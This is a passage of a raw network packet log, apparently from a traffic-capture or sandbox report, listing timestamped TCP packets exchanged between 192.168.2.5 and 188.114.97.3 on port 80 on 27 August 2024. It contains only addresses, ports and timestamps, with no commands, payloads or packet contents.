                              Aug 27, 2024 09:48:54.934077024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934139013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934174061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934185982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934211969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934222937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934233904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934243917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934247017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934253931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934254885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934272051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934345007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934355974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934365988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934386015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934406042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934412003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934422970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934436083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934454918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934549093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934560061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934568882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934580088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934591055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934601068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934657097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934676886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934684038 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934716940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934720039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934729099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934742928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934752941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934777021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934803009 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934820890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934832096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934865952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934911966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934922934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934931993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934943914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934956074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.934956074 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.934990883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935080051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935101032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935148954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935163021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935163021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935174942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935187101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935198069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935209990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935214043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935256004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935301065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935309887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935317039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935373068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935391903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935395002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935408115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935409069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935420036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935446024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935583115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935594082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935605049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935616970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935628891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935632944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935640097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935641050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935652018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935662985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935704947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935724974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.935729980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935739994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.935771942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.953021049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953031063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953039885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953049898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953059912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953111887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953121901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953130960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.953164101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.953218937 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018019915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018043995 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018054008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018143892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018153906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018162966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018167019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018178940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018187046 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018217087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018270969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018281937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018309116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018374920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018387079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018397093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018404961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018428087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018465042 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018529892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018539906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018548965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018558979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018573046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018583059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018589020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018593073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018659115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018681049 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018727064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018737078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018745899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018784046 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018882990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018893957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018903017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018913984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018924952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018934965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018946886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.018949986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.018980026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019042015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019210100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019218922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019228935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019275904 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019284964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019294977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019305944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019316912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019325018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019366980 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019370079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019378901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019383907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019414902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019459963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019469023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019484043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019494057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019504070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019515991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.019522905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019547939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.019561052 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022170067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022211075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022218943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022293091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022308111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022317886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022320032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022330999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022347927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022361040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022361040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022397041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022461891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022479057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022490978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022528887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022566080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022577047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022610903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022628069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022638083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022681952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022707939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022716999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022756100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022790909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022800922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022838116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022838116 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022852898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022861958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022882938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022897959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022952080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022960901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022975922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022988081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.022994041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.022999048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023086071 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023112059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023123026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023133039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023144960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023153067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023155928 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023183107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023195028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023206949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023216009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023252010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023281097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023293018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023302078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023312092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023320913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023329973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023355007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023422003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023605108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023613930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023623943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023675919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023699999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023710012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023715973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023725033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023736000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023793936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023823023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.023921967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023935080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023946047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.023979902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024033070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024044991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024055004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024075985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024101019 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024214983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024224043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024235010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024245024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024255991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024260998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024276018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024338961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024348021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024358988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024369001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024379015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024386883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024389029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024411917 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024538994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024548054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024558067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.024581909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.024640083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.041446924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041585922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041594982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041604996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041615009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041627884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041639090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041649103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.041662931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.041697979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.106950998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.106978893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.106993914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.106998920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107004881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107018948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107026100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107145071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107152939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.107156992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107168913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107178926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107184887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.107199907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.107218027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107229948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107239008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107249975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107261896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107310057 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.107497931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107513905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107527018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107538939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107656002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107667923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107718945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107729912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107741117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107752085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107757092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.107835054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.107876062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.123733044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.123761892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.123774052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.123857021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.123864889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.123877048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.123879910 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.123893023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.123923063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124042988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124053955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124063015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124073982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124085903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124090910 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124103069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124119043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124138117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124169111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124214888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124278069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124288082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124298096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124309063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124320030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124320030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124335051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124346972 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124382019 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124572039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124582052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124592066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124608994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124620914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124620914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124633074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124645948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124646902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124677896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124701977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124713898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124723911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124736071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124742985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.124747038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124758959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.124763966 CEST6138380192.168.2.5188.114.97.3
